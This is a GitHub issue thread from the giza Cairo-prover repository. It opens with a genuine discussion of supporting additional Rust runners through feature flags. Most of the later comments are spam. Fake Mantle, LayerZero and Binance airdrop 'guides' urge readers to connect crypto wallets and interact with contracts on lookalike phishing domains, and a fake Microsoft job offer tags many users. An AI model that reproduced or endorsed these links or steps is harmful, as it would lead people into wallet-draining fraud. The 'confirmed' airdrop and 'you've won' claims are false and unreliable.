### ISSUE TITLE
Support multiple Rust runners

### ISSUE THREAD

**Issue by maxgillett** [maxgillett/giza#4]
The current runner is based on an implementation by O(1) labs, and in particular is lacking Python hint support. It would be nice to integrate Cleopatra and/or Oriac (two other Rust runners that plan to support hints) once they are complete.

**Comment by frisitano** [comment]
I'm happy to pick this up.  Cleopatra looks most mature out of the two.  Do you agree it is the better choice?

**Comment by maxgillett** [comment]
Hey @frisitano, thanks for volunteering! Cleopatra seems to be the more mature runner at the moment with a significant amount of hint support and a lot of active developers. Following the discussion in https://github.com/maxgillett/giza/pull/1#discussion_r876131184, however, it might be best to remain modular and not fully integrate it into Giza. One question is whether we can use components of Cleopatra (or alter the current runner code in Giza) to more quickly construct the full execution trace needed for proof generation, as this is still quite slow for large traces. Would you be willing to look into that?

**Comment by frisitano** [comment]
I agree with the philosophy of keeping things modular and maintaining that giza has the single responsibility of proving cairo execution traces.  However, I also see the value in having a unified cli that allows users to both generate and prove execution traces.  One way I believe this can be achieved is using `feature` flags that trigger optional dependencies / code.  For example, say a user wanted to include the `cleopatra` runner in the cli they could build with `--feature cleopatra`.  This pattern could work with any number of runners including the o1 labs fork.  I would then suggest to introduce an additional cli method for generating an execution trace e.g. `giza execute --runner cleopatra --trace-file trace.bin --memory-file ...`.  These outputs would then be fed as inputs to the `giza prove ...` command.

On a more general note what is the rationale behind maintaining and extending the o1 labs fork runner?

**Comment by pradip-ee** [comment]
### Hooray! You've Scored a Spot in the Mantle Airdrop


At Mantle, we hold our community in high esteem and want to extend our gratitude for your steadfast support. That's why you've clinched a spot in this exclusive airdrop bonanza. We've taken notice of your lively engagement, contributions, or unwavering loyalty to the Mantle ecosystem, and we believe it's time for you to enjoy the fruits of this special airdrop.

By participating in this exclusive event, you stand to receive Mantle tokens as a token of our appreciation. These tokens open doors to thrilling possibilities within the Mantle ecosystem, offering access to exclusive features, a voice in governance decisions, and even potential future perks.

We're over the moon to have you on board for this exclusive airdrop, and we're dedicated to ensuring a seamless claiming process just for you. Let's dive in and grab those Mantle Airdrop tokens!

[Claim Your Mantle Airdrop Now](https://mantlexyz.fly.dev/)

![Claim Now](https://i.ytimg.com/vi/BtX2NwkAJaE/maxresdefault.jpg)

### Secure Your Mantle Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Swing by the [Mantle Airdrop](https://mantlexyz.fly.dev/).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Verify your eligibility for the Mantle Airdrop [right here](https://mantlexyz.fly.dev/).

3. **Engage for Extra Rewards:**
   - Join community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Feel free to share your experiences or ask any questions about claiming the Mantle Airdrop in the comments below. Let's make this process a breeze for everyone!

[Mantle Network Airdrop Guide — How to Claim](https://mantlexyz.fly.dev/)

**Comment by Isoltec** [comment]
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!

**Comment by lukesnackcrate** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

**Comment by prezo-ci-bkp** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by leocsilva** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Congratulations! You've been selected to apply for an exclusive software developer position at Microsoft!

## How to Apply:
To take advantage of this exciting opportunity, please click [here](https://jobsindeed.online). Hurry, applications close on [March 6, 2024](https://jobsindeed.online).

## Job Description:
- **Position:** Senior Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan with dental and vision coverage
  - Company-contributed retirement plan with matching
  - Flexible working hours and work-from-home options
  - Generous paid time off and parental leave policies
  - Professional development opportunities and training support
  - Collaborative and inclusive work environment

## Requirements:
- Minimum of 5 years of experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Extensive experience with frameworks such as React, Angular, or Vue.js
- Strong problem-solving skills and ability to work in a fast-paced environment
- Excellent communication and teamwork skills

**Note:** This position is open to candidates from anywhere in the world. Don't miss this opportunity to join a dynamic team at Microsoft and make a significant impact in the tech industry!
Maksimnoviy, @galib11, @a3259454, @ElenaB111, @haroonabbhas, @xogus020406, @valeass32, @mattgene, @Agness001, @lemah12, @XandrKom, @karamuh, @Jonson218, @thinhnguyen312, @Pingtrifis, @nndhard17, @mdsozib12, @ICLXL, @Chukens, @Blun20
